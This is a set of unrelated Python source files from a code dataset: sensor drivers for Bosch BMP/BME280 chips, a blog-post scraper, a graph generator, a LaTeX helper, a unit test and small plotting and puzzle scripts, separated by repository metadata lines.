buf[0], p, h = self.sensor.readAll() # temp., press., hum.
if self.NChannels > 1:
buf[1] = p
if self.NChannels > 2:
buf[2] = h
else:
buf[0] = self.sensor.read_temperature() # in degC
if self.NChannels > 1:
buf[1] = self.sensor.read_pressure()/100. # in hPa
def closeDevice(self):
# nothing to do here
pass
## ----- driver section -----------
# driver code for BMP085/180,
# adapted from original code by Tony DiCola, (c) Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Operating Modes
BMP085_ULTRALOWPOWER = 0
BMP085_STANDARD = 1
BMP085_HIGHRES = 2
BMP085_ULTRAHIGHRES = 3
# BMP085 Registers
BMP085_CAL_AC1 = 0xAA # R Calibration data (16 bits)
BMP085_CAL_AC2 = 0xAC # R Calibration data (16 bits)
BMP085_CAL_AC3 = 0xAE # R Calibration data (16 bits)
BMP085_CAL_AC4 = 0xB0 # R Calibration data (16 bits)
BMP085_CAL_AC5 = 0xB2 # R Calibration data (16 bits)
BMP085_CAL_AC6 = 0xB4 # R Calibration data (16 bits)
BMP085_CAL_B1 = 0xB6 # R Calibration data (16 bits)
BMP085_CAL_B2 = 0xB8 # R Calibration data (16 bits)
BMP085_CAL_MB = 0xBA # R Calibration data (16 bits)
BMP085_CAL_MC = 0xBC # R Calibration data (16 bits)
BMP085_CAL_MD = 0xBE # R Calibration data (16 bits)
BMP085_CONTROL = 0xF4
BMP085_TEMPDATA = 0xF6
BMP085_PRESSUREDATA = 0xF6
# Commands
BMP085_READTEMPCMD = 0x2E
BMP085_READPRESSURECMD = 0x34
class BMP085(object):
def __init__(self, mode=BMP085_STANDARD, address=BMP_I2CADDR, i2c=None, busnum=1, i2c_interface=None):
# Check that mode is valid.
if mode not in [BMP085_ULTRALOWPOWER, BMP085_STANDARD, BMP085_HIGHRES, BMP085_ULTRAHIGHRES]:
      raise ValueError(('Unexpected mode value {0}. Set mode to one of '
        'BMP085_ULTRALOWPOWER, BMP085_STANDARD, BMP085_HIGHRES, or BMP085_ULTRAHIGHRES').format(mode))
self._mode = mode
# Create I2C device.
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
self._device = i2c.get_i2c_device(address, busnum=busnum, i2c_interface=i2c_interface)
# Load calibration values.
self._load_calibration()
def _load_calibration(self):
self.cal_AC1 = self._device.readS16BE(BMP085_CAL_AC1) # INT16
self.cal_AC2 = self._device.readS16BE(BMP085_CAL_AC2) # INT16
self.cal_AC3 = self._device.readS16BE(BMP085_CAL_AC3) # INT16
self.cal_AC4 = self._device.readU16BE(BMP085_CAL_AC4) # UINT16
self.cal_AC5 = self._device.readU16BE(BMP085_CAL_AC5) # UINT16
self.cal_AC6 = self._device.readU16BE(BMP085_CAL_AC6) # UINT16
self.cal_B1 = self._device.readS16BE(BMP085_CAL_B1) # INT16
self.cal_B2 = self._device.readS16BE(BMP085_CAL_B2) # INT16
self.cal_MB = self._device.readS16BE(BMP085_CAL_MB) # INT16
self.cal_MC = self._device.readS16BE(BMP085_CAL_MC) # INT16
self.cal_MD = self._device.readS16BE(BMP085_CAL_MD) # INT16
def _load_datasheet_calibration(self):
# Set calibration from values in the datasheet example. Useful for debugging the
# temp and pressure calculation accuracy.
self.cal_AC1 = 408
self.cal_AC2 = -72
self.cal_AC3 = -14383
self.cal_AC4 = 32741
self.cal_AC5 = 32757
self.cal_AC6 = 23153
self.cal_B1 = 6190
self.cal_B2 = 4
self.cal_MB = -32767
self.cal_MC = -8711
self.cal_MD = 2868
def read_raw_temp(self):
"""Reads the raw (uncompensated) temperature from the sensor."""
self._device.write8(BMP085_CONTROL, BMP085_READTEMPCMD)
time.sleep(0.005) # Wait 5ms
raw = self._device.readU16BE(BMP085_TEMPDATA)
return raw
def read_raw_pressure(self):
"""Reads the raw (uncompensated) pressure level from the sensor."""
self._device.write8(BMP085_CONTROL, BMP085_READPRESSURECMD + (self._mode << 6))
if self._mode == BMP085_ULTRALOWPOWER:
time.sleep(0.005)
elif self._mode == BMP085_HIGHRES:
time.sleep(0.014)
elif self._mode == BMP085_ULTRAHIGHRES:
time.sleep(0.026)
else:
time.sleep(0.008)
msb = self._device.readU8(BMP085_PRESSUREDATA)
lsb = self._device.readU8(BMP085_PRESSUREDATA+1)
xlsb = self._device.readU8(BMP085_PRESSUREDATA+2)
raw = ((msb << 16) + (lsb << 8) + xlsb) >> (8 - self._mode)
return raw
def read_temperature(self):
"""Gets the compensated temperature in degrees celsius."""
UT = self.read_raw_temp()
# Datasheet value for debugging:
#UT = 27898
# Calculations below are taken straight from section 3.5 of the datasheet.
X1 = ((UT - self.cal_AC6) * self.cal_AC5) >> 15
X2 = (self.cal_MC << 11) // (X1 + self.cal_MD)
B5 = X1 + X2
temp = ((B5 + 8) >> 4) / 10.0
return temp
def read_pressure(self):
"""Gets the compensated pressure in Pascals."""
UT = self.read_raw_temp()
UP = self.read_raw_pressure()
# Datasheet values for debugging:
#UT = 27898
#UP = 23843
# Calculations below are taken straight from section 3.5 of the datasheet.
# Calculate true temperature coefficient B5.
X1 = ((UT - self.cal_AC6) * self.cal_AC5) >> 15
X2 = (self.cal_MC << 11) // (X1 + self.cal_MD)
B5 = X1 + X2
# Pressure Calculations
B6 = B5 - 4000
X1 = (self.cal_B2 * (B6 * B6) >> 12) >> 11
X2 = (self.cal_AC2 * B6) >> 11
X3 = X1 + X2
B3 = (((self.cal_AC1 * 4 + X3) << self._mode) + 2) // 4
X1 = (self.cal_AC3 * B6) >> 13
X2 = (self.cal_B1 * ((B6 * B6) >> 12)) >> 16
X3 = ((X1 + X2) + 2) >> 2
B4 = (self.cal_AC4 * (X3 + 32768)) >> 15
B7 = (UP - B3) * (50000 >> self._mode)
if B7 < 0x80000000:
p = (B7 * 2) // B4
else:
p = (B7 // B4) * 2
X1 = (p >> 8) * (p >> 8)
X1 = (X1 * 3038) >> 16
X2 = (-7357 * p) >> 16
p = p + ((X1 + X2 + 3791) >> 4)
return p
def read_altitude(self, sealevel_pa=101325.0):
"""Calculates the altitude in meters."""
# Calculation taken straight from section 3.6 of the datasheet.
pressure = float(self.read_pressure())
altitude = 44330.0 * (1.0 - pow(pressure / sealevel_pa, (1.0/5.255)))
return altitude
def read_sealevel_pressure(self, altitude_m=0.0):
"""Calculates the pressure at sealevel when given a known altitude in
meters. Returns a value in Pascals."""
pressure = float(self.read_pressure())
p0 = pressure / pow(1.0 - altitude_m/44330.0, 5.255)
return p0
# driver code for BMP280 (Guenter Quast, 2018)
# adapted vom code by Bastien Wirtz <[email protected]>
#
# Based on the Adafruit BMP280 Driver C++ driver and the BMP085 python lib.
# - https://github.com/adafruit/Adafruit_BMP280_Library
# - https://github.com/adafruit/Adafruit_Python_BMP
#
# Datasheet: https://www.adafruit.com/datasheets/BST-BMP280-DS001-11.pdf
# BMP280 Registers
BMP280_DIG_T1 = 0x88 # R Unsigned Calibration data (16 bits)
BMP280_DIG_T2 = 0x8A # R Signed Calibration data (16 bits)
BMP280_DIG_T3 = 0x8C # R Signed Calibration data (16 bits)
BMP280_DIG_P1 = 0x8E # R Unsigned Calibration data (16 bits)
BMP280_DIG_P2 = 0x90 # R Signed Calibration data (16 bits)
BMP280_DIG_P3 = 0x92 # R Signed Calibration data (16 bits)
BMP280_DIG_P4 = 0x94 # R Signed Calibration data (16 bits)
BMP280_DIG_P5 = 0x96 # R Signed Calibration data (16 bits)
BMP280_DIG_P6 = 0x98 # R Signed Calibration data (16 bits)
BMP280_DIG_P7 = 0x9A # R Signed Calibration data (16 bits)
BMP280_DIG_P8 = 0x9C # R Signed Calibration data (16 bits)
BMP280_DIG_P9 = 0x9E # R Signed Calibration data (16 bits)
BMP280_CONTROL = 0xF4
BMP280_RESET = 0xE0
BMP280_CONFIG = 0xF5
BMP280_PRESSUREDATA = 0xF7
BMP280_TEMPDATA = 0xFA
class BMP280(object):
def __init__(self, address=BMP_I2CADDR, i2c=None, busnum=1, i2c_interface= None):
# Adadfruit I2C interface
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
self._device = i2c.get_i2c_device(address,
busnum = busnum, i2c_interface = i2c_interface)
if self._device.readU8(REG_ID) != BMP280_CHIPID:
raise Exception('Unsupported chip')
# Load calibration values.
self._load_calibration()
self._device.write8(BMP280_CONTROL, 0x3F)
def _load_calibration(self):
self.cal_t1 = int(self._device.readU16(BMP280_DIG_T1)) # UINT16
self.cal_t2 = int(self._device.readS16(BMP280_DIG_T2)) # INT16
self.cal_t3 = int(self._device.readS16(BMP280_DIG_T3)) # INT16
self.cal_p1 = int(self._device.readU16(BMP280_DIG_P1)) # UINT16
self.cal_p2 = int(self._device.readS16(BMP280_DIG_P2)) # INT16
self.cal_p3 = int(self._device.readS16(BMP280_DIG_P3)) # INT16
self.cal_p4 = int(self._device.readS16(BMP280_DIG_P4)) # INT16
self.cal_p5 = int(self._device.readS16(BMP280_DIG_P5)) # INT16
self.cal_p6 = int(self._device.readS16(BMP280_DIG_P6)) # INT16
self.cal_p7 = int(self._device.readS16(BMP280_DIG_P7)) # INT16
self.cal_p8 = int(self._device.readS16(BMP280_DIG_P8)) # INT16
self.cal_p9 = int(self._device.readS16(BMP280_DIG_P9)) # INT16
def _load_datasheet_calibration(self):
# Set calibration from values in the datasheet example. Useful for debugging the
# temp and pressure calculation accuracy.
self.cal_t1 = 27504
self.cal_t2 = 26435
self.cal_t3 = -1000
self.cal_p1 = 36477
self.cal_p2 = -10685
self.cal_p3 = 3024
self.cal_p4 = 2855
self.cal_p5 = 140
self.cal_p6 = -7
self.cal_p7 = 15500
self.cal_p8 = -14500
self.cal_p9 = 6000
def read_raw(self, register):
"""Reads the raw (uncompensated) temperature or pressure from the sensor."""
raw = self._device.readU16BE(register)
raw <<= 8
raw = raw | self._device.readU8(register + 2)
raw >>= 4
return raw
def _compensate_temp(self, raw_temp):
""" Compensate temperature """
t1 = (((raw_temp >> 3) - (self.cal_t1 << 1)) *
(self.cal_t2)) >> 11
t2 = (((((raw_temp >> 4) - (self.cal_t1)) *
((raw_temp >> 4) - (self.cal_t1))) >> 12) *
(self.cal_t3)) >> 14
return t1 + t2
def read_temperature(self):
"""Gets the compensated temperature in degrees celsius."""
raw_temp = self.read_raw(BMP280_TEMPDATA)
compensated_temp = self._compensate_temp(raw_temp)
    temp = float((compensated_temp * 5 + 128) >> 8) / 100
return temp
def read_pressure(self):
"""Gets the compensated pressure in Pascals."""
raw_temp = self.read_raw(BMP280_TEMPDATA)
compensated_temp = self._compensate_temp(raw_temp)
raw_pressure = self.read_raw(BMP280_PRESSUREDATA)
p1 = compensated_temp - 128000
p2 = p1 * p1 * self.cal_p6
p2 += (p1 * self.cal_p5) << 17
p2 += self.cal_p4 << 35
p1 = ((p1 * p1 * self.cal_p3) >> 8) + ((p1 * self.cal_p2) << 12)
p1 = ((1 << 47) + p1) * (self.cal_p1) >> 33
if 0 == p1:
return 0
p = 1048576 - raw_pressure
p = (((p << 31) - p2) * 3125) // p1
p1 = (self.cal_p9 * (p >> 13) * (p >> 13)) >> 25
p2 = (self.cal_p8 * p) >> 19
p = ((p + p1 + p2) >> 8) + ((self.cal_p7) << 4)
return float(p // 256)
def read_altitude(self, sealevel_pa=101325.0):
"""Calculates the altitude in meters."""
# Calculation taken straight from section 3.6 of the datasheet.
pressure = float(self.read_pressure())
    altitude = 44330.0 * (1.0 - pow(pressure / sealevel_pa, (1.0 / 5.255)))
return altitude
def read_sealevel_pressure(self, altitude_m=0.0):
"""Calculates the pressure at sealevel when given a known altitude in
meters. Returns a value in Pascals."""
pressure = float(self.read_pressure())
    p0 = pressure / pow(1.0 - altitude_m / 44330.0, 5.255)
return p0
# driver code for BMP/E280,
# adapted from original code by Matt Hawkins
#--------------------------------------
## import smbus
from ctypes import c_short
from ctypes import c_byte
from ctypes import c_ubyte
# some helper functions
def getShort(data, index):
# return two bytes from data as a signed 16-bit value
return c_short((data[index+1] << 8) + data[index]).value
def getUShort(data, index):
# return two bytes from data as an unsigned 16-bit value
return (data[index+1] << 8) + data[index]
def getChar(data,index):
# return one byte from data as a signed char
result = data[index]
if result > 127:
result -= 256
return result
def getUChar(data,index):
# return one byte from data as an unsigned char
result = data[index] & 0xFF
return result
# Register Addresses
REG_DATA = 0xF7
REG_CONTROL = 0xF4
REG_CONFIG = 0xF5
REG_CONTROL_HUM = 0xF2
REG_HUM_MSB = 0xFD
REG_HUM_LSB = 0xFE
# Oversample setting - page 27
OVERSAMPLE_TEMP = 2
OVERSAMPLE_PRES = 2
MODE = 1
# Oversample setting for humidity register - page 26
OVERSAMPLE_HUM = 2
class BME280(object):
"""Class to represent the Bosch BMP280 temperature and pressure sensor
"""
def __init__(self, address=BMP_I2CADDR, i2c=None):
self.DEVICE = address
if i2c==None:
self.bus = smbus.SMBus(1) # Rev 2 Pi, Pi 2 & Pi 3 uses bus 1
# Rev 1 Pi uses bus 0
else:
self.bus = i2c
# initialise calibration constants from device
self.init()
def init(self):
self.bus.write_byte_data(self.DEVICE, REG_CONTROL_HUM, OVERSAMPLE_HUM)
control = OVERSAMPLE_TEMP<<5 | OVERSAMPLE_PRES<<2 | MODE
self.bus.write_byte_data(self.DEVICE, REG_CONTROL, control)
# Read blocks of calibration data from EEPROM
# See Page 22 data sheet
cal1 = self.bus.read_i2c_block_data(self.DEVICE, 0x88, 24)
cal2 = self.bus.read_i2c_block_data(self.DEVICE, 0xA1, 1)
cal3 = self.bus.read_i2c_block_data(self.DEVICE, 0xE1, 7)
# Convert byte data to word values
self.dig_T1 = getUShort(cal1, 0)
self.dig_T2 = getShort(cal1, 2)
self.dig_T3 = getShort(cal1, 4)
self.dig_P1 = getUShort(cal1, 6)
self.dig_P2 = getShort(cal1, 8)
self.dig_P3 = getShort(cal1, 10)
self.dig_P4 = getShort(cal1, 12)
self.dig_P5 = getShort(cal1, 14)
self.dig_P6 = getShort(cal1, 16)
self.dig_P7 = getShort(cal1, 18)
self.dig_P8 = getShort(cal1, 20)
self.dig_P9 = getShort(cal1, 22)
self.dig_H1 = getUChar(cal2, 0)
self.dig_H2 = getShort(cal3, 0)
self.dig_H3 = getUChar(cal3, 2)
self.dig_H4 = getChar(cal3, 3)
self.dig_H4 = (self.dig_H4 << 24) >> 20
self.dig_H4 = self.dig_H4 | (getChar(cal3, 4) & 0x0F)
self.dig_H5 = getChar(cal3, 5)
self.dig_H5 = (self.dig_H5 << 24) >> 20
self.dig_H5 = self.dig_H5 | (getUChar(cal3, 4) >> 4 & 0x0F)
self.dig_H6 = getChar(cal3, 6)
# Wait in ms (Datasheet Appendix B: Measurement time and current calculation)
wait_time = 1.25 + (2.3 * OVERSAMPLE_TEMP) + ((2.3 * OVERSAMPLE_PRES) + 0.575) + ((2.3 * OVERSAMPLE_HUM)+0.575)
time.sleep(wait_time/1000) # Wait the required time
def readAll(self):
# Read temperature/pressure/humidity
data = self.bus.read_i2c_block_data(self.DEVICE, REG_DATA, 8)
pres_raw = (data[0] << 12) | (data[1] << 4) | (data[2] >> 4)
temp_raw = (data[3] << 12) | (data[4] << 4) | (data[5] >> 4)
hum_raw = (data[6] << 8) | data[7]
#Refine temperature
var1 = ((((temp_raw>>3)-(self.dig_T1<<1)))*(self.dig_T2)) >> 11
var2 = (((((temp_raw>>4) - (self.dig_T1)) * ((temp_raw>>4) - (self.dig_T1))) >> 12) * (self.dig_T3)) >> 14
t_fine = var1+var2
        t = float(((t_fine * 5) + 128) >> 8)
# Refine pressure and adjust for temperature
var1 = t_fine / 2.0 - 64000.0
var2 = var1 * var1 * self.dig_P6 / 32768.0
var2 = var2 + var1 * self.dig_P5 * 2.0
var2 = var2 / 4.0 + self.dig_P4 * 65536.0
var1 = (self.dig_P3 * var1 * var1 / 524288.0 + self.dig_P2 * var1) / 524288.0
var1 = (1.0 + var1 / 32768.0) * self.dig_P1
if var1 == 0:
p=0
else:
p = 1048576.0 - pres_raw
p = ((p - var2 / 4096.0) * 6250.0) / var1
var1 = self.dig_P9 * p * p / 2147483648.0
var2 = p * self.dig_P8 / 32768.0
p = p + (var1 + var2 + self.dig_P7) / 16.0
# Refine humidity
h = t_fine - 76800.0
h = (hum_raw - (self.dig_H4 * 64.0 + self.dig_H5 / 16384.0 * h))
h = h * (self.dig_H2 / 65536.0 * (1.0 + self.dig_H6 / 67108864.0 * h * (1.0 + self.dig_H3 / 67108864.0 * h)))
h = h * (1.0 - self.dig_H1 * h / 524288.0)
if h > 100:
h = 100
elif h < 0:
h = 0.
return t/100.0, p/100, h
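# A minimal usage sketch (added; assumes a BME280 wired to I2C bus 1 at the
# default address, with smbus available on the host):
#
#   sensor = BME280()
#   temperature, pressure, humidity = sensor.readAll()
#   print("%.2f C  %.2f hPa  %.2f %%" % (temperature, pressure, humidity))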
| 37.572973 | 115 | 0.625713 |
bf281cd951d471f8f3251ddfdd7f8a3865f06533
| 997 |
py
|
Python
|
code/bp_chrono/pull.py
|
niplav/site
|
09380a8585e6b067c4cce23da13ca9601320bd51
|
[
"MIT"
] | 2 |
2022-02-09T14:02:59.000Z
|
2022-03-23T11:50:47.000Z
|
code/bp_chrono/pull.py
|
niplav/site
|
09380a8585e6b067c4cce23da13ca9601320bd51
|
[
"MIT"
] | null | null | null |
code/bp_chrono/pull.py
|
niplav/site
|
09380a8585e6b067c4cce23da13ca9601320bd51
|
[
"MIT"
] | null | null | null |
import urllib2
from bs4 import BeautifulSoup
import datetime

for year in range(2006, datetime.datetime.now().year + 1):
    yearposts = []
    for page in range(1, 1000):
        url = 'http://bit-player.org/{}/page/{}'.format(year, page)
        req = urllib2.Request(url, headers={'User-Agent': "Firefox"})
        try:
            con = urllib2.urlopen(req)
        except urllib2.HTTPError:
            break
        data = con.read()
        soup = BeautifulSoup(data, 'html.parser')
        posts = soup.find_all(class_="post")
        for p in posts:
            title = p.find_all(class_="entry-title")[0].a.text
            link = p.find_all(class_="entry-title")[0].a.get('href')
            meta = p.find_all(class_="entry-meta")[0]
            author = meta.find_all(class_='author')[0].a.text
            date = meta.find_all(class_='entry-date')[0].text
            entry = '* [{}]({}) ({}, {})'.format(title.encode('utf_8'), str(link), str(author), str(date))
            yearposts.append(entry)
    print('\n### {}\n'.format(year))
    for t in reversed(yearposts):
        print(t)
| 34.37931 | 95 | 0.677031 |
171490bbc4b54039d8da2749936c53a0a9bbab76
| 669 |
py
|
Python
|
FuzzyACO.py
|
siej88/FuzzyACO
|
989a58049c8417cd023cfc312fb99d2649333ca7
|
[
"MIT"
] | null | null | null |
FuzzyACO.py
|
siej88/FuzzyACO
|
989a58049c8417cd023cfc312fb99d2649333ca7
|
[
"MIT"
] | null | null | null |
FuzzyACO.py
|
siej88/FuzzyACO
|
989a58049c8417cd023cfc312fb99d2649333ca7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
UNIVERSIDAD DE CONCEPCION
Departamento de Ingenieria Informatica y
Ciencias de la Computacion
Undergraduate thesis, Informatics Civil Engineering
EDGE DETECTION IN DGGE IMAGES USING A HYBRID
ACO SYSTEM WITH FUZZY LOGIC
Author: Sebastian Ignacio Espinoza Jimenez
Advisor: Maria Angelica Pinninghoff Junemann
"""
import MainWindow as mw
import sys
from PyQt4 import QtGui as gui
def main():
app = gui.QApplication(sys.argv)
qIcon = gui.QIcon('resources\\icon.png')
app.setWindowIcon(qIcon)
mainWindow = mw.MainWindow()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| 23.892857 | 50 | 0.715994 |
da0b4162359d7b9c3db5245a001e7bac5fff4082
| 247 |
py
|
Python
|
doc/examples/inlined/bug_beniget.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 88 |
2019-01-08T16:39:08.000Z
|
2022-02-06T14:19:23.000Z
|
doc/examples/inlined/bug_beniget.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 13 |
2019-06-20T15:53:10.000Z
|
2021-02-09T11:03:29.000Z
|
doc/examples/inlined/bug_beniget.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 1 |
2019-11-05T03:03:14.000Z
|
2019-11-05T03:03:14.000Z
|
import gast as ast
import beniget
mod = ast.parse("""
T = int
def func() -> T:
return 1
""")
fdef = mod.body[1]
node = fdef.returns
du = beniget.DefUseChains()
du.visit(mod)
du.chains[node]
ud = beniget.UseDefChains(du)
ud.chains[node]
| 11.227273 | 29 | 0.659919 |
da39dee0899ff76b9c89c9b7001253e79c5c01fc
| 958 |
py
|
Python
|
SPS-Variants/backup/top-k-overview/backup/preZhi/genData/1.py
|
RapidsAtHKUST/SimRank
|
3a601b08f9a3c281e2b36b914e06aba3a3a36118
|
[
"MIT"
] | 8 |
2020-04-14T23:17:00.000Z
|
2021-06-21T12:34:04.000Z
|
related_projects/source_codes/top-k-overview/preZhi/genData/1.py
|
RapidsAtHKUST/SimRank
|
3a601b08f9a3c281e2b36b914e06aba3a3a36118
|
[
"MIT"
] | null | null | null |
related_projects/source_codes/top-k-overview/preZhi/genData/1.py
|
RapidsAtHKUST/SimRank
|
3a601b08f9a3c281e2b36b914e06aba3a3a36118
|
[
"MIT"
] | 1 |
2021-01-17T16:26:50.000Z
|
2021-01-17T16:26:50.000Z
|
import networkx as nx
import sys

if __name__ == '__main__':
    # Example invocation: python 1.py ER 1000 5
    if len(sys.argv) < 4:
        print('Usage: genData <graphType [ER, WS, SF, BA]> <nodeNum> <perIndegree>')
        sys.exit(1)
    nodeN = int(sys.argv[2])
    inDeg = int(sys.argv[3])
    gtype = str(sys.argv[1])
    graph_name = gtype + str(nodeN) + '-' + str(inDeg) + '.data'
    if gtype == 'ER':
        print(gtype)
        G = nx.random_graphs.erdos_renyi_graph(nodeN, 1.0 * inDeg / nodeN, None, True)
    elif gtype == 'WS':
        G = nx.random_graphs.watts_strogatz_graph(nodeN, inDeg, 0.3)
    elif gtype == 'SF':
        # restored from the commented-out call; scale_free_graph builds its own
        # MultiDiGraph, so the old empty_graph() seed was dropped
        G = nx.scale_free_graph(nodeN, 0.49, 0.50, 0.01, 0.2, 0)
    elif gtype == 'BA':
        G = nx.barabasi_albert_graph(nodeN, inDeg)
    else:
        print('invalid graph type. Valid ones are [ER, WS, SF, BA]')
        sys.exit(1)
    print('------')
    nx.write_edgelist(G, graph_name, data=False)
| 34.214286 | 86 | 0.577244 |
da70277ecbcd81adab1f454b961d582f033746d9
| 2,014 |
py
|
Python
|
latex/creator.py
|
tworkool/HTW-Bachelorarbeit-Template-v2
|
e0eb2d7ac5acf476d2b5a97407820017f098e6b3
|
[
"MIT"
] | null | null | null |
latex/creator.py
|
tworkool/HTW-Bachelorarbeit-Template-v2
|
e0eb2d7ac5acf476d2b5a97407820017f098e6b3
|
[
"MIT"
] | null | null | null |
latex/creator.py
|
tworkool/HTW-Bachelorarbeit-Template-v2
|
e0eb2d7ac5acf476d2b5a97407820017f098e6b3
|
[
"MIT"
] | null | null | null |
import os
import sys
import pyperclip
def find_file(directory, file_name):
    # walk the directory tree and return the first file whose name contains file_name
    for root, dirs, files in os.walk(directory):
        for basename in files:
            if file_name in basename:
                extension = basename.split('.')[-1]
                fl_name = basename.replace(f'.{extension}', "")
                return root, basename, fl_name, extension
def generate_latex():
try:
if sys.argv and len(sys.argv) > 1:
out = None
print("INFO: found argument ", sys.argv[1])
cur_path = os.path.dirname(os.path.abspath(__file__))
file_name = input()
if "-c" in sys.argv[1]:
new_path = f"{cur_path}/code"
basepath, full, short, ext = find_file(
new_path, file_name.strip())
short_basepath = basepath.replace(new_path, "")
short_basepath_and_file = f'code{short_basepath}/{full}'
                out = f'\\codefull{{code:{short}}}{{XXXXX}}{{{ext}}}{{{short_basepath_and_file}}}'
elif "-a" in sys.argv[1]:
new_path = f"{cur_path}/abb"
basepath, full, short, ext = find_file(
new_path, file_name.strip())
short_basepath = basepath.replace(new_path, "")
short_basepath_and_file = f'abb{short_basepath}/{short}'
out = f'\\begin{{figure}}[H]\n\t\\centering\n\t\\includegraphics[width=1.0\\textwidth]{{{short_basepath_and_file}}}\n\t\\caption{{XXXXXX}}\n\t\\label{{img:{short}}}\n\\end{{figure}}'
else:
print(f"ERROR: INVALID ARGUMENT, -a for images, -c for code")
return
print("----------------")
print(out)
print("----------------")
pyperclip.copy(out)
else:
print(f"ERROR: NO ARGUMENT FOUND")
except Exception:
print(f"ERROR: NO FILE FOUND")
generate_latex()
| 38.730769 | 198 | 0.531281 |
daf811fb4627374f08ea73bd18f5a54f1547e28c
| 300 |
py
|
Python
|
algorithms/strings/make_it_anagram.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
algorithms/strings/make_it_anagram.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
algorithms/strings/make_it_anagram.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
import collections, sys
if __name__ == '__main__':
A = sys.stdin.readline().strip()
B = sys.stdin.readline().strip()
a = collections.Counter(A)
b = collections.Counter(B)
length = sum(min(a[c], b[c]) for c in (set(A) & set(B)))
print((len(A) - length) + (len(B) - length))
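# Added worked example: for A = "cde" and B = "abc" the only shared letter is
# "c", so (3 - 1) + (3 - 1) = 4 deletions are required to make them anagrams.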
| 25 | 60 | 0.59 |
97be418b689a696d71dd3d357d24703a7a55af3f
| 1,370 |
py
|
Python
|
tests/books/createbookssuite.py
|
showhue/adzuki
|
23dff5b01905ba3622b4846708c6fd9d2fdd7385
|
[
"BSD-3-Clause"
] | null | null | null |
tests/books/createbookssuite.py
|
showhue/adzuki
|
23dff5b01905ba3622b4846708c6fd9d2fdd7385
|
[
"BSD-3-Clause"
] | 5 |
2019-03-19T22:21:28.000Z
|
2020-09-16T03:08:56.000Z
|
tests/books/createbookssuite.py
|
showhue/adzuki
|
23dff5b01905ba3622b4846708c6fd9d2fdd7385
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import datetime, timezone
from tests.books import AbstractTestBook, Book
class CreateBooksSuite(AbstractTestBook):
def setUp(self):
self._ISBN = '978-0618968633'
def tearDown(self):
key = self._client.key(self._kind, self._ISBN)
self._client.delete(key)
def testCreate(self):
expected_book_entity = {
'title': 'The Hobbit',
'language': 'English',
'pages': 320,
'author': {
'name': 'J.R.R. Tolkien'
},
'released_at': datetime(2007, 9, 17, tzinfo=timezone.utc)
}
books_model = Book()
book_handler = books_model.create(self._ISBN)
for key, value in expected_book_entity.items():
book_handler[key] = value
book_handler.put()
book_entity = books_model.get(self._ISBN)
self.assertEqual(book_entity.id, self._ISBN)
for key, value in expected_book_entity.items():
self.assertEqual(book_entity[key], value)
def testCreateWrongSchema(self):
input_entity = {
'title': 'The Hobbit',
'language': 'English',
'pages': 320,
'author.name1': 'J.R.R. Tolkien',
'released_at': '2007-09-17T00:00:00Z'
}
books_model = Book()
book_handler = books_model.create(self._ISBN)
for key, value in input_entity.items():
book_handler[key] = value
with self.assertRaises(Exception):
book_handler.put()
| 27.959184 | 63 | 0.651825 |
c14a8b7609e410aa3047a1fea7a1b58cccdf07be
| 359 |
py
|
Python
|
simple-tensorflow-demo/3.neural network/tf_3rd_1_matplotlib.py
|
crackedcd/Intern.MT
|
36398837af377a7e1c4edd7cbb15eabecd2c3103
|
[
"MIT"
] | 1 |
2019-07-05T03:42:17.000Z
|
2019-07-05T03:42:17.000Z
|
simple-tensorflow-demo/3.neural network/tf_3rd_1_matplotlib.py
|
crackedcd/Intern.MT
|
36398837af377a7e1c4edd7cbb15eabecd2c3103
|
[
"MIT"
] | null | null | null |
simple-tensorflow-demo/3.neural network/tf_3rd_1_matplotlib.py
|
crackedcd/Intern.MT
|
36398837af377a7e1c4edd7cbb15eabecd2c3103
|
[
"MIT"
] | 1 |
2019-06-24T05:56:55.000Z
|
2019-06-24T05:56:55.000Z
|
import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(0, 10, 1000)
y = np.sin(x)
z = np.cos(x**2)
plt.figure(figsize=(8, 4))
plt.plot(x, y, label=r"$\sin(x)$", color="red", linewidth=2)
plt.plot(x, z, "b--", label=r"$\cos(x^2)$")
plt.xlabel("Time(s)")
plt.ylabel("Volt")
plt.title("matplotlib example")
plt.ylim(-1.2, 1.2)
plt.legend()
plt.show()
| 19.944444 | 58 | 0.635097 |
c15fb5cec0b5bcaf2823ab5f0b1bb6defefa7f3d
| 10,555 |
py
|
Python
|
Project Euler Qusetions 51 - 60/Project Euler Question 54.py
|
Clayton-Threm/Coding-Practice
|
6671e8a15f9e797338caa617dae45093f4157bc1
|
[
"MIT"
] | 1 |
